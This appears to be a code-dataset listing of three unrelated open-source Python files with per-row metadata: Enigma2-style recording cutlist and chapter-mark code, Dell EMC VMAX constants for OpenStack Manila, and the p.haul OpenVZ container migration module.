			timestring = "%d:%02d" % (self.timeCreate[3], self.timeCreate[4])
			template = template.replace("$T", timestring)
		else:
			template = template.replace("$Y", "").replace("$M", "").replace("$D", "").replace("$T", "")
		return template
	def produceFinalCuesheet(self):
		"""Convert the raw cuesheet into a strict IN/OUT cutlist, relocate
		chapter marks into the kept timeline, and update the estimated
		length/disk usage accordingly. Times are in 90 kHz PTS ticks."""
		CUT_TYPE_IN = 0
		CUT_TYPE_OUT = 1
		CUT_TYPE_MARK = 2
		CUT_TYPE_LAST = 3
		accumulated_in = 0
		accumulated_at = 0
		last_in = 0
		self.cutlist = [ ]
		self.chaptermarks = [ ]
		# our demuxer expects *strictly* IN,OUT lists.
		currently_in = not any(type == CUT_TYPE_IN for pts, type in self.cuesheet)
		if currently_in:
			self.cutlist.append(0) # emulate "in" at first
		for (pts, type) in self.cuesheet:
			#print "pts=", pts, "type=", type, "accumulated_in=", accumulated_in, "accumulated_at=", accumulated_at, "last_in=", last_in
			if type == CUT_TYPE_IN and not currently_in:
				self.cutlist.append(pts)
				last_in = pts
				currently_in = True
			if type == CUT_TYPE_OUT and currently_in:
				self.cutlist.append(pts)
				# accumulate the segment
				accumulated_in += pts - last_in
				accumulated_at = pts
				currently_in = False
			if type == CUT_TYPE_MARK and currently_in:
				# relocate chaptermark against "in" time. This is not 100% accurate,
				# as the in/out points are not.
				reloc_pts = pts - last_in + accumulated_in
				self.chaptermarks.append(reloc_pts)
		if len(self.cutlist) > 1:
			# Scale the estimated disk usage by the kept fraction of the
			# recording (length is seconds; PTS runs at 90000 ticks/s).
			part = accumulated_in / (self.length*90000.0)
			usedsize = int ( part * self.filesize )
			self.estimatedDiskspace = usedsize
			self.length = accumulated_in / 90000
	def getChapterMarks(self, template="$h:$m:$s.$t"):
		"""Return chapter marks formatted with the template tokens
		$h hours, $m minutes, $s seconds, $t milliseconds.

		If no explicit marks exist and autochapter is set, generate marks
		every N minutes (skipping the final stretch)."""
		timestamps = [ ]
		chapters = [ ]
		minutes = self.properties.autochapter.getValue()
		if len(self.chaptermarks) < 1 and minutes > 0:
			chapterpts = 0
			while chapterpts < (self.length-60*minutes)*90000:
				chapterpts += 90000 * 60 * minutes
				chapters.append(chapterpts)
		else:
			chapters = self.chaptermarks
		for p in chapters:
			# PTS -> wall clock (Python 2 integer division throughout).
			timestring = template.replace("$h", str(p / (90000 * 3600)))
			timestring = timestring.replace("$m", ("%02d" % (p % (90000 * 3600) / (90000 * 60))))
			timestring = timestring.replace("$s", ("%02d" % (p % (90000 * 60) / 90000)))
			timestring = timestring.replace("$t", ("%03d" % ((p % 90000) / 90)))
			timestamps.append(timestring)
		return timestamps
| gpl-2.0 | 1,176,808,851,013,645,800 | 36.52907 | 127 | 0.696514 | false | 3.119865 | true | false | false |
vponomaryov/manila | manila/share/drivers/dell_emc/plugins/vmax/constants.py | 1 | 1753 | # Copyright (c) 2016 Dell Inc. or its subsidiaries.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
# Severity levels that appear in responses from the backend XML API server.
STATUS_OK = 'ok'
STATUS_INFO = 'info'
STATUS_DEBUG = 'debug'
STATUS_WARNING = 'warning'
STATUS_ERROR = 'error'
STATUS_NOT_FOUND = 'not_found'
# Numeric problem codes embedded in XML API error responses, used to
# recognize specific failure conditions.  NOTE(review): the values are
# opaque backend codes -- confirm against the EMC XML API reference
# before changing any of them.
MSG_GENERAL_ERROR = '13690601492'
MSG_INVALID_VDM_ID = '14227341325'
MSG_INVALID_MOVER_ID = '14227341323'
MSG_FILESYSTEM_NOT_FOUND = "18522112101"
MSG_FILESYSTEM_EXIST = '13691191325'
# NOTE(review): MSG_VDM_EXIST and MSG_INTERFACE_NAME_EXIST below share
# the same code ('13421840550'); callers must rely on the operation
# context to tell the two conditions apart.
MSG_VDM_EXIST = '13421840550'
MSG_SNAP_EXIST = '13690535947'
MSG_INTERFACE_NAME_EXIST = '13421840550'
MSG_INTERFACE_EXIST = '13691781136'
MSG_INTERFACE_INVALID_VLAN_ID = '13421850371'
MSG_INTERFACE_NON_EXISTENT = '13691781134'
MSG_JOIN_DOMAIN = '13157007726'
MSG_UNJOIN_DOMAIN = '13157007723'
# Necessary to retry when VMAX database is locked for provisioning operation
MSG_CODE_RETRY = '13421840537'
# NOTE(review): presumably the number of network allocations requested
# per share server -- verify against the driver code that consumes it.
IP_ALLOCATIONS = 2
# Request header and XML envelope constants for the XML API endpoint.
CONTENT_TYPE_URLENCODE = {'Content-Type': 'application/x-www-form-urlencoded'}
XML_HEADER = '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
XML_NAMESPACE = 'http://www.emc.com/schemas/celerra/xml_api'
# CIFS access-level names used when building share access rules.
CIFS_ACL_FULLCONTROL = 'fullcontrol'
CIFS_ACL_READ = 'read'
# Default pattern of backend "lock not acquired" errors; presumably
# matched against SSH command output to decide whether to retry.
SSH_DEFAULT_RETRY_PATTERN = r'Error 2201:.*: unable to acquire lock\(s\)'
| apache-2.0 | 1,427,866,968,296,748,000 | 30.872727 | 78 | 0.731888 | false | 2.976231 | false | false | false |
avagin/p.haul | p_haul_ovz.py | 1 | 4646 | #
# OpenVZ containers hauler module
#
import os
import shutil
import p_haul_cgroup
import p_haul_netifapi as netif
import p_haul_fsapi as fsapi
import p_haul_netapi as netapi
import fs_haul_shared
import fs_haul_subtree
# Identifier of this hauler type, returned as the first element of id().
name = "ovz"
# vzctl keeps a per-container pidfile here; root_task_pid() reads it.
vzpid_dir = "/var/lib/vzctl/vepid/"
# Standard OpenVZ layout: private areas (CT filesystems) and mounted
# roots live under /vz.
vz_dir = "/vz"
vzpriv_dir = "%s/private" % vz_dir
vzroot_dir = "%s/root" % vz_dir
# Per-CT config files (<ctid>.conf) live here.
vz_conf_dir = "/etc/vz/conf/"
# Same location as vzpid_dir; restored() writes the pidfile back here.
vz_pidfiles = "/var/lib/vzctl/vepid/"
# Name of the cgroup meta-image file shipped between nodes.
cg_image_name = "ovzcg.img"
class p_haul_type:
	"""OpenVZ container hauler type.

	Implements the p.haul hauler interface for OpenVZ containers: it
	locates a CT's config, private area and mounted root, ships the
	config and cgroup state as meta-images, bind-mounts the root
	filesystem and locks/unlocks the CT's veth devices during migration.
	"""

	def __init__(self, id):
		self._ctid = id
		#
		# This list contains netapi.net_dev objects where
		#	.name is the name of the veth device in CT
		#	.pair is its peer on the host
		#	.link is the bridge to which this veth is attached
		#
		self._veths = []
		# Raw lines of the CT config file, kept verbatim so the
		# destination node can write the very same config back.
		self._cfg = []

	def __load_ct_config(self, dir):
		"""Read the CT config from dir, collecting veth pairs from NETIF."""
		print("Loading config file from %s" % dir)

		# 'with' guarantees the descriptor is closed on any exit path.
		with open(os.path.join(dir, self.__ct_config())) as ifd:
			for line in ifd:
				self._cfg.append(line)

				if line.startswith("NETIF="):
					#
					# Parse and keep veth pairs, later we will
					# equip restore request with this data and
					# will use it while (un)locking the network
					#
					v_in = None
					v_out = None
					v_bridge = None
					vs = line.strip().split("=", 1)[1].strip("\"")
					for parm in vs.split(","):
						pa = parm.split("=")
						if pa[0] == "ifname":
							v_in = pa[1]
						elif pa[0] == "host_ifname":
							v_out = pa[1]
						elif pa[0] == "bridge":
							v_bridge = pa[1]

					if v_in and v_out:
						print("\tCollect %s -> %s (%s) veth" % (v_in, v_out, v_bridge))
						veth = netapi.net_dev()
						veth.name = v_in
						veth.pair = v_out
						veth.link = v_bridge
						self._veths.append(veth)

	def __apply_cg_config(self):
		print("Applying CT configs")
		# FIXME -- implement
		pass

	def id(self):
		return (name, self._ctid)

	def init_src(self):
		"""Prepare the source side: FS is mounted and veths are bridged."""
		self._fs_mounted = True
		self._bridged = True
		self.__load_ct_config(vz_conf_dir)

	def init_dst(self):
		"""Prepare the destination side: nothing mounted or bridged yet."""
		self._fs_mounted = False
		self._bridged = False

	def root_task_pid(self):
		"""Return the host-side pid of the CT init task (vzctl pidfile)."""
		# Close the pidfile promptly instead of leaking the descriptor.
		with open(os.path.join(vzpid_dir, self._ctid)) as pf:
			return int(pf.read())

	def __ct_priv(self):
		return "%s/%s" % (vzpriv_dir, self._ctid)

	def __ct_root(self):
		return "%s/%s" % (vzroot_dir, self._ctid)

	def __ct_config(self):
		return "%s.conf" % self._ctid

	#
	# Meta-images for OVZ -- container config and info about CGroups
	#
	def get_meta_images(self, dir):
		"""Dump cgroup state into dir; return (path, image-name) pairs."""
		cg_img = os.path.join(dir, cg_image_name)
		p_haul_cgroup.dump_hier(self.root_task_pid(), cg_img)
		cfg_name = self.__ct_config()
		return [(os.path.join(vz_conf_dir, cfg_name), cfg_name),
			(cg_img, cg_image_name)]

	def put_meta_images(self, dir):
		"""Install the CT config from dir and remember the cgroup image."""
		print("Putting config file into %s" % vz_conf_dir)

		self.__load_ct_config(dir)
		with open(os.path.join(vz_conf_dir, self.__ct_config()), "w") as ofd:
			ofd.writelines(self._cfg)

		# Keep this name, we'll need one in prepare_ct()
		self.cg_img = os.path.join(dir, cg_image_name)

	#
	# Create cgroup hierarchy and put root task into it
	# Hierarchy is unlimited, we will apply config limitations
	# in ->restored->__apply_cg_config later
	#
	def prepare_ct(self, pid):
		p_haul_cgroup.restore_hier(pid, self.cg_img)

	def __umount_root(self):
		print("Umounting CT root")
		os.system("umount %s" % self.__ct_root())
		self._fs_mounted = False

	def mount(self):
		"""Bind-mount the CT private area onto its root; return the path."""
		nroot = self.__ct_root()
		print("Mounting CT root to %s" % nroot)
		if not os.access(nroot, os.F_OK):
			os.makedirs(nroot)
		os.system("mount --bind %s %s" % (self.__ct_priv(), nroot))
		self._fs_mounted = True
		return nroot

	def umount(self):
		if self._fs_mounted:
			self.__umount_root()

	def get_fs(self):
		"""Pick a FS hauler matching the filesystem the CT lives on."""
		rootfs = fsapi.path_to_fs(self.__ct_priv())
		if not rootfs:
			print("CT is on unknown FS")
			return None

		print("CT is on %s" % rootfs)

		if rootfs == "nfs":
			# Shared storage -- nothing needs copying.
			return fs_haul_shared.p_haul_fs()
		if rootfs == "ext3" or rootfs == "ext4":
			# Local storage -- copy the private-area subtree.
			return fs_haul_subtree.p_haul_fs(self.__ct_priv())

		print("Unknown CT FS")
		return None

	def restored(self, pid):
		"""Finalize restore: write the vzctl pidfile, apply cgroup config."""
		print("Writing pidfile")
		with open(os.path.join(vz_pidfiles, self._ctid), 'w') as pidfile:
			pidfile.write("%d" % pid)

		self.__apply_cg_config()

	def net_lock(self):
		# Bring the host-side veth ends down while the CT is frozen.
		# BUG FIX: _veths holds net_dev objects (see __load_ct_config),
		# so use attribute access; the old veth[1]/veth[2] indexing
		# would raise TypeError.
		for veth in self._veths:
			netif.ifdown(veth.pair)

	def net_unlock(self):
		# Bring the host-side veth ends back up and re-attach them to
		# their bridges unless this side already has them bridged.
		for veth in self._veths:
			netif.ifup(veth.pair)
			if veth.link and not self._bridged:
				netif.bridge_add(veth.pair, veth.link)

	def can_migrate_tcp(self):
		return True

	def veths(self):
		#
		# Return the collected net_dev objects (.name in CT, .pair on
		# host, .link bridge); see __load_ct_config for how they are
		# built.
		#
		return self._veths
| lgpl-2.1 | 7,124,431,274,139,254,000 | 23.197917 | 67 | 0.63022 | false | 2.556962 | true | false | false |
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.